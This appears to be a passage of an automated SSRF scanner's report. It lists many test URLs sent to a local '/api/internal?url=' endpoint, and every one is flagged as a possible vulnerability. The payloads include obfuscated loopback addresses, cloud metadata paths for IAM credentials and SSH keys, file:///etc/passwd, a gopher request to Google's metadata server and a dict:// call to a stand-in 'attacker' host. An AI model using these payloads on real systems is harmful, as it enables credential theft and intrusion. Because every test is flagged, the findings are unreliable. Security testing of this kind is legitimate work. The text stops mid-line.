`http://localhost:4200/api/internal?url=1.0.0.127.in-addr.arpa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=1.0.0.127.in-addr.arpa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=01111111000000000000000000000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=01111111000000000000000000000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x0.0x0.0x1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f.0x0.0x0.0x1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0177.0.0.01` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0177.0.0.01` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=7F000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=7F000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=2130706433` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=2130706433` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=6425673729` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=6425673729` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127_0._0_1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127_0._0_1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A%3A1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A%3A1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%3A%3Affff%3A7f00%3A0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%3A%3Affff%3A7f00%3A0001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localtest.me` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localtest.me` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=bugbounty.dod.network` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=bugbounty.dod.network` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.127.127.127` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.127.127.127` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0177.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0177.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=whitelisted%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=whitelisted%40127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=017700000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=017700000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0177.00.00.01` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0177.00.00.01` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000.0000.0000.0000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000.0000.0000.0000` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0177.0000.0000.0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0177.0000.0000.0001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0177.0001.0000..0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0177.0001.0000..0001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x1.0x0.0x1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f.0x1.0x0.0x1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x1.0x1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f.0x1.0x1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A%2B11211aaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A%2B11211aaa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A00011211aaaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A00011211aaaa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=2852039166` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=2852039166` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=7147006462` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=7147006462` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0xa9.0xfe.0xa9.0xfe` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0xa9.0xfe.0xa9.0xfe` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0251.0376.0251.0376` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0251.0376.0251.0376` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169%E3%80%82254%E3%80%82169%E3%80%82254` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169%E3%80%82254%E3%80%82169%E3%80%82254` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=dict%3A%2F%2Fattacker%3A11111` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=dict%3A%2F%2Fattacker%3A11111` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fetc%2Fpasswd` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fetc%2Fpasswd` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2Fpath%2Fto%2Ffile` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=file%3A%2F%2Fpath%2Fto%2Ffile` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0.0.0.0%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0.0.0.0%3A443` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0.0.0.0%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0.0.0.0%3A3389` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A%3A1%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A25` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A%3A1%3A25` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A3128` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A%3A1%3A3128` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0000%3A%3A1%3A3389` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0251.00376.000251.0000376` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0251.00376.000251.0000376` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x41414141A9FEA9FE` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x41414141A9FEA9FE` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0xA9.0xFE.0xA9.0xFE` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0xA9.0xFE.0xA9.0xFE` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0xA9FEA9FE` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0xA9FEA9FE` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0xa9fea9fe` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0xa9fea9fe` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.0` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A2379%2Fversion` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A2379%2Fversion` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A443` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A3389` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A8000` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A9901` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A8001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A8444` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.127.127.127.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.127.127.127.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254.xip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254.xip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fuser-data` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fuser-data` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fattributes%2F` + ⚠️ - **Possible SSRF 